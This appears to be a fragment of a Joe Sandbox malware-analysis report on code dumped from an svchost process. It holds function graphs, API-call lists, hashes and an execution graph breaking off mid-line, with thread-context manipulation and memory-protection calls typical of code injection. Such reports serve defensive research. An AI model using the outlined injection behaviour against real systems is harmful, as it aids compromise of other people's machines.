                                                control_flow_graph 577 25304fb5c10-25304fb5c37 578 25304fb5c4b-25304fb5c56 GetCurrentThreadId 577->578 579 25304fb5c39-25304fb5c48 577->579 580 25304fb5c62-25304fb5c69 578->580 581 25304fb5c58-25304fb5c5d 578->581 579->578 583 25304fb5c7b-25304fb5c8f 580->583 584 25304fb5c6b-25304fb5c76 call 25304fb5a40 580->584 582 25304fb608f-25304fb60a6 call 25304fb7a20 581->582 587 25304fb5c9e-25304fb5ca4 583->587 584->582 590 25304fb5d75-25304fb5d96 587->590 591 25304fb5caa-25304fb5cb3 587->591 595 25304fb5d9c-25304fb5dbc GetThreadContext 590->595 596 25304fb5eff-25304fb5f10 call 25304fb759f 590->596 593 25304fb5cb5-25304fb5cf8 call 25304fb86a0 591->593 594 25304fb5cfa-25304fb5d6d call 25304fb45f0 call 25304fb4590 call 25304fb4550 591->594 607 25304fb5d70 593->607 594->607 599 25304fb5dc2-25304fb5de3 595->599 600 25304fb5efa 595->600 611 25304fb5f15-25304fb5f1b 596->611 599->600 610 25304fb5de9-25304fb5df2 599->610 600->596 607->587 613 25304fb5e72-25304fb5e83 610->613 614 25304fb5df4-25304fb5e05 610->614 615 25304fb5fde-25304fb5fee 611->615 616 25304fb5f21-25304fb5f78 VirtualProtect FlushInstructionCache 611->616 617 25304fb5ef5 613->617 618 25304fb5e85-25304fb5ea3 613->618 622 25304fb5e6d 614->622 623 25304fb5e07-25304fb5e1c 614->623 620 25304fb5ffe-25304fb600a call 25304fb4ed0 615->620 621 25304fb5ff0-25304fb5ff7 615->621 624 25304fb5f7a-25304fb5f84 616->624 625 25304fb5fa9-25304fb5fd9 call 25304fb798c 616->625 618->617 627 25304fb5ea5-25304fb5ef0 call 25304fb39e0 call 25304fb75bd 618->627 640 25304fb600f-25304fb6015 620->640 621->620 629 25304fb5ff9 call 25304fb44c0 621->629 622->617 623->622 631 25304fb5e1e-25304fb5e68 call 25304fb3a50 SetThreadContext 623->631 624->625 626 25304fb5f86-25304fb5fa1 call 25304fb4470 624->626 625->611 626->625 627->617 629->620 631->622 643 25304fb6057-25304fb6075 640->643 644 25304fb6017-25304fb6055 ResumeThread call 25304fb798c 640->644 645 25304fb6089 643->645 646 25304fb6077-25304fb6086 643->646 644->640 645->582 646->645
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd
                                                Similarity
                                                • API ID: Thread$Current$Context
                                                • String ID:
                                                • API String ID: 1666949209-0
                                                • Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                • Instruction ID: 759198d8d6c4d108c050b88fbfc782b609783f07715a0fe92259dec7b2a94b7a
                                                • Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                • Instruction Fuzzy Hash: 1ED1BC76208F8881DA70DB1AE89435A77A0F3C9BD9F105116EA8D47BA5CF3CC741CB54
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocFree
                                                • String ID: dialer
                                                • API String ID: 756756679-3528709123
                                                • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                • Instruction ID: b804e1cbaa629f32825eba2626bbc09a8a8ac9faaa89b1fd146f1ed92ba7e5d3
                                                • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                • Instruction Fuzzy Hash: 9F31C431B01F5186EB11DF16ED0836963A4FB45BE6F04A1209F4807B95EF38D7A5C798
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd
                                                Similarity
                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                • String ID:
                                                • API String ID: 517849248-0
                                                • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                • Instruction ID: 2984ae07a048d58245a482cc1bb410a837a662bb8bf73f834388467e3972f8c8
                                                • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                • Instruction Fuzzy Hash: 85015731700F4196EA14DB12E95835963A5F788FE2F48C135CE89837A4DE38CB898364
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                • String ID:
                                                • API String ID: 449555515-0
                                                • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                • Instruction ID: f1e3e1805cca17ab3c5fa360e36fcb8d6c5d86005c73efd2be66d3f03da98cd5
                                                • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                • Instruction Fuzzy Hash: 07111776611F4086EB24DB21ED0D75A66A0BB49BE7F049429CE49077E4EF3DC708C768
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 2395640692-629598281
                                                • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction ID: dc1323f8a371ea885bfc1b6e8b070370cd12f57438e79da8c8b3fc12404828d9
                                                • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction Fuzzy Hash: 6A51AC72A11B008AEB18CB15EC4CF583795F346BEAF50A120DB16477C8EBB5CB41C7A8
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 2395640692-629598281
                                                • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction ID: 29dccc7489ba2c133c631e9e5c062e93cb9b466311e8d1f25909deb730f4a6e3
                                                • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction Fuzzy Hash: E231BA72200B4096E714DF22EC4CB193BA5F346BEAF15D514AE5A037C9CB78CB41C7A8
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd
                                                Similarity
                                                • API ID: FinalHandleNamePathlstrlen
                                                • String ID: \\?\
                                                • API String ID: 2719912262-4282027825
                                                • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                • Instruction ID: d28ad028590f7058dc277c93f962f9fb4e4a598b35e8bf33c852813925367010
                                                • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                • Instruction Fuzzy Hash: B2F04F72304B4192EB60DB61FE993996760F744BEAF88E020CE4946994DE3CC788CB58
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd
                                                Similarity
                                                • API ID: CombinePath
                                                • String ID: \\.\pipe\
                                                • API String ID: 3422762182-91387939
                                                • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                • Instruction ID: 5da940802144578b45a251a6d117f91e8815bce262305d92a978d628b4cfe626
                                                • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                • Instruction Fuzzy Hash: 86F0A720704F8091EE04CB13BE4D159A220FB48FE2F08E131DE5A07BA8CE3CC7418318
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                • Instruction ID: 156e89ea958fa978a0021a7824ae5fa1eb0e9f307b5443539d2f12bc2c0c7183
                                                • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                • Instruction Fuzzy Hash: 27F08262711F4091EF84CB60FD9C3642360EB48BE2F04B419990B456E5CF38C788CB28
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentThread
                                                • String ID:
                                                • API String ID: 2882836952-0
                                                • Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                • Instruction ID: 3b7c3188c13dce8f3069841534293cf79643936ba1d6dcb7eb5ee116b1e977cb
                                                • Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                • Instruction Fuzzy Hash: 9C021932219B8086EB60CB55E89435EB7A1F3C57E5F106015EA8E87BA8DF7CC684CF54
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd
                                                Similarity
                                                • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                • String ID:
                                                • API String ID: 2210144848-0
                                                • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                • Instruction ID: cfd9d903ffadf2afe2b78b2d9fce3c6cd300b1d51d735b1b390dd1a09605796b
                                                • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                • Instruction Fuzzy Hash: 9B819C22610F10CDFB50EBA5DE483AD26A0F745BEAF44A116DE0A53AD2DE348747C739
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentThread
                                                • String ID:
                                                • API String ID: 2882836952-0
                                                • Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                • Instruction ID: 5c0d319de4b41508922d42687b587cf25951b4c5ba02f31c4a732a7390086c1f
                                                • Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                • Instruction Fuzzy Hash: D761D736519B40D6E760DB15E88831AB7A0F3C9BA9F106125EA8D43BE8CB7CC741CF59
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd
                                                Similarity
                                                • API ID: _set_statfp
                                                • String ID:
                                                • API String ID: 1156100317-0
                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction ID: a6c0b64116f2ef89320645c36914f6097c47f0ed12c20e4878e3ccb8977ddbbc
                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction Fuzzy Hash: 5B11E922E54F0041F798D164EF9E3651040BBA63F6F05E664BA76063D78B748F61D93C
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2636784109.0000025304F80000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304F80000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_25304f80000_svchost.jbxd
                                                Similarity
                                                • API ID: _set_statfp
                                                • String ID:
                                                • API String ID: 1156100317-0
                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction ID: 198b6cbbaf1078db734d95a1d187a68f7134e07c2f4a0f37309d103bf5bf6eb0
                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction Fuzzy Hash: E1114022644F0301FB549165EF5D76932606B543F6F482734EAF746BE68A34CF42413D
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                • String ID:
                                                • API String ID: 1092925422-0
                                                • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                • Instruction ID: 88823a78059470b5ad7926548310e3d41740f28cbf7f6594bc03e59556c6745e
                                                • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                • Instruction Fuzzy Hash: C0113C3A744F4086FB54DB11F80826966A1F789BE5F049029DE8907B94EF3DC704C758
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2636784109.0000025304F80000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304F80000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_25304f80000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 3242871069-629598281
                                                • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction ID: 84c274a7ac89c5fbb67926a31e47b2fcf95c1c2609dbb4769fd76b8b94fd6b1c
                                                • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction Fuzzy Hash: F6518E32612B008BEB14EF15EC48B593795F744BFAF91A528DA064B7C8EB34DF518728
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2636784109.0000025304F80000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304F80000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_25304f80000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 3242871069-629598281
                                                • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction ID: 859561567f322decfba4e951b1c9912cdbf8dfb580fc71819216983a80865003
                                                • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction Fuzzy Hash: 40316872211B4097E714EF11EC48B1937A4F740BEAF95A518AE5A0B784CB38CB61C729
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$Free
                                                • String ID:
                                                • API String ID: 3168794593-0
                                                • Opcode ID: 58c4a46a428cd9431a43c23367012082d3a0a44734d7d4b43a30409f6f14bb0b
                                                • Instruction ID: 992deb86ba04eb4c42088d36e1cb011303db7c67522ea1b6f23e777eda326c38
                                                • Opcode Fuzzy Hash: 58c4a46a428cd9431a43c23367012082d3a0a44734d7d4b43a30409f6f14bb0b
                                                • Instruction Fuzzy Hash: E5114C31A14F98DAEB54DF66A94825A7370F78ABD1F049029DF8A03794DF38C251C758
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd
                                                Similarity
                                                • API ID: FileType
                                                • String ID: \\.\pipe\
                                                • API String ID: 3081899298-91387939
                                                • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                • Instruction ID: 8e5e549fbe60b4a26aa7e07bdd4787ccf6247e5b05dd1d8bed4f17f408d17450
                                                • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                • Instruction Fuzzy Hash: 3071D332200F8185EB24DF25AD5C3EA6794F786BE6F456016DD8947BC8DE35C704C794
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd
                                                Similarity
                                                • API ID: FileType
                                                • String ID: \\.\pipe\
                                                • API String ID: 3081899298-91387939
                                                • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                • Instruction ID: 8a19f639f826e8ed3cb024e327ff3d6268ad1f2c2b2029dfeab7991282de7c96
                                                • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                • Instruction Fuzzy Hash: CE510C32204F8142E634DE299D5C3AE6652F3877E1F026065CD8A43FD9CE39C7018BE8
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastWrite
                                                • String ID: U
                                                • API String ID: 442123175-4171548499
                                                • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                • Instruction ID: b6ae02ee91339585ee91c669ba0d75d4ba2da8bb78dceee93f3a99faf05a04dc
                                                • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                • Instruction Fuzzy Hash: 6C41A072614F8085EB20DF65E9483AAB7A0F7887E5F419025EE4D87798DF38C642CB54
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd
                                                Similarity
                                                • API ID: Stringtry_get_function
                                                • String ID: LCMapStringEx
                                                • API String ID: 2588686239-3893581201
                                                • Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                • Instruction ID: 73455e267512f8ce58ba33fe9f0236e7d0a70026506fa2b3217eddc7dcb4b48a
                                                • Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                • Instruction Fuzzy Hash: CD114A36608BC086D760CB16F84429AB7A1F7C9BE0F549126EE8D83B99DF38C640CB44
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd
                                                Similarity
                                                • API ID: ExceptionFileHeaderRaise
                                                • String ID: csm
                                                • API String ID: 2573137834-1018135373
                                                • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                • Instruction ID: 2239c350e170cedadb2b3450c76999124c3cb75d1e7e07f87273f6fbe5723600
                                                • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                • Instruction Fuzzy Hash: 81114F32204F8082EB61CF15E94465977E4F789BE9F189220DF8D077A4DF78C651CB44
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd
                                                Similarity
                                                • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                • String ID: InitializeCriticalSectionEx
                                                • API String ID: 539475747-3084827643
                                                • Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                • Instruction ID: 238ca74183596822a82de3661d6a50f78822c328c070e3d827985df9fe0efc09
                                                • Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                • Instruction Fuzzy Hash: 5CF08225710F8091EB09EB41FD486956322EB88BE2F58E025AD5903B94CE38CB95C768
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd
                                                Similarity
                                                • API ID: Valuetry_get_function
                                                • String ID: FlsSetValue
                                                • API String ID: 738293619-3750699315
                                                • Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                • Instruction ID: 78f647240c4775a9c640fa88ff1a0d7804cd4d462ba6e236699d67d8e078e451
                                                • Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                • Instruction Fuzzy Hash: F7E06D61200F40A1EA08DB50FD086956322AB887E2F58E022D909063D5CE38CB99CB79
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2636784109.0000025304F80000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304F80000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_25304f80000_svchost.jbxd
                                                Similarity
                                                • API ID: try_get_function
                                                • String ID: November$October
                                                • API String ID: 2742660187-1636048786
                                                • Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                • Instruction ID: 52ba9ca23a8df96962fd09b36a0c13f1d65c6f1ce3b9b25d624a97e7ea60cfc9
                                                • Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                • Instruction Fuzzy Hash: F2E09221204F8193EB05DB52FC4C2E43221EB947E6F5A702696190A2D2CE38CFD78378
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocFree
                                                • String ID:
                                                • API String ID: 756756679-0
                                                • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                • Instruction ID: c84b4d11aa1048d09faf7564bf290920bfda1e11df7055f33e959c56517ae6d1
                                                • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                • Instruction Fuzzy Hash: 1521A132604F9086EB11CF5AA90829AB3A0FB89BE5F059110DE8C47BA4EF38D746C754
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$AllocProcess
                                                • String ID:
                                                • API String ID: 1617791916-0
                                                • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                • Instruction ID: 31d046753ef1f573ed55d3259e55d586ac2698879a40b7dbdb248a4b8ad203b8
                                                • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                • Instruction Fuzzy Hash: B6E06D71A11B008AE704CF62DC0834936F1FB89FA2F48D024CD0907390DF7D8699C760

                                                Execution Graph

                                                Execution Coverage:0.6%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:0%
                                                Total number of Nodes:80
                                                Total number of Limit Nodes:8
                                                execution_graph 20777 16c2116b860 20782 16c2116b871 _set_errno_from_matherr 20777->20782 20778 16c2116b8c2 20783 16c2116b840 6 API calls _set_errno_from_matherr 20778->20783 20779 16c2116b8a6 HeapAlloc 20780 16c2116b8c0 20779->20780 20779->20782 20782->20778 20782->20779 20783->20780 20784 16c211cb860 20788 16c211cb871 _invalid_parameter_noinfo 20784->20788 20785 16c211cb8c2 20790 16c211cb840 7 API calls _invalid_parameter_noinfo 20785->20790 20786 16c211cb8a6 HeapAlloc 20787 16c211cb8c0 20786->20787 20786->20788 20788->20785 20788->20786 20790->20787 20791 16c21161c28 20796 16c21161650 GetProcessHeap HeapAlloc 20791->20796 20793 16c21161c3e Sleep SleepEx 20794 16c21161c37 20793->20794 20794->20793 20795 16c211615c0 StrCmpIW StrCmpW 20794->20795 20795->20794 20840 16c21161274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 20796->20840 20798 16c21161678 20841 16c21161274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 20798->20841 20800 16c21161689 20842 16c21161274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 20800->20842 20802 16c21161692 20843 16c21161274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 20802->20843 20804 16c2116169b 20805 16c211616b6 RegOpenKeyExW 20804->20805 20806 16c211618ce 20805->20806 20807 16c211616e8 RegOpenKeyExW 20805->20807 20806->20794 20808 16c21161711 20807->20808 20809 16c21161727 RegOpenKeyExW 20807->20809 20844 16c211612c8 16 API calls 20808->20844 20811 16c21161762 RegOpenKeyExW 20809->20811 20812 16c2116174b 20809->20812 20815 16c2116179d RegOpenKeyExW 20811->20815 20816 16c21161786 20811->20816 20845 16c2116104c 6 API calls 20812->20845 20813 16c2116171d RegCloseKey 20813->20809 20819 16c211617c1 20815->20819 20820 16c211617d8 RegOpenKeyExW 20815->20820 20846 16c211612c8 16 API calls 20816->20846 20817 16c21161758 RegCloseKey 20817->20811 20847 16c211612c8 16 API calls 20819->20847 20822 16c21161813 RegOpenKeyExW 20820->20822 20823 16c211617fc 20820->20823 20827 16c2116184e RegOpenKeyExW 20822->20827 20828 16c21161837 20822->20828 20848 16c211612c8 16 API calls 20823->20848 20824 16c21161793 RegCloseKey 20824->20815 20825 16c211617ce RegCloseKey 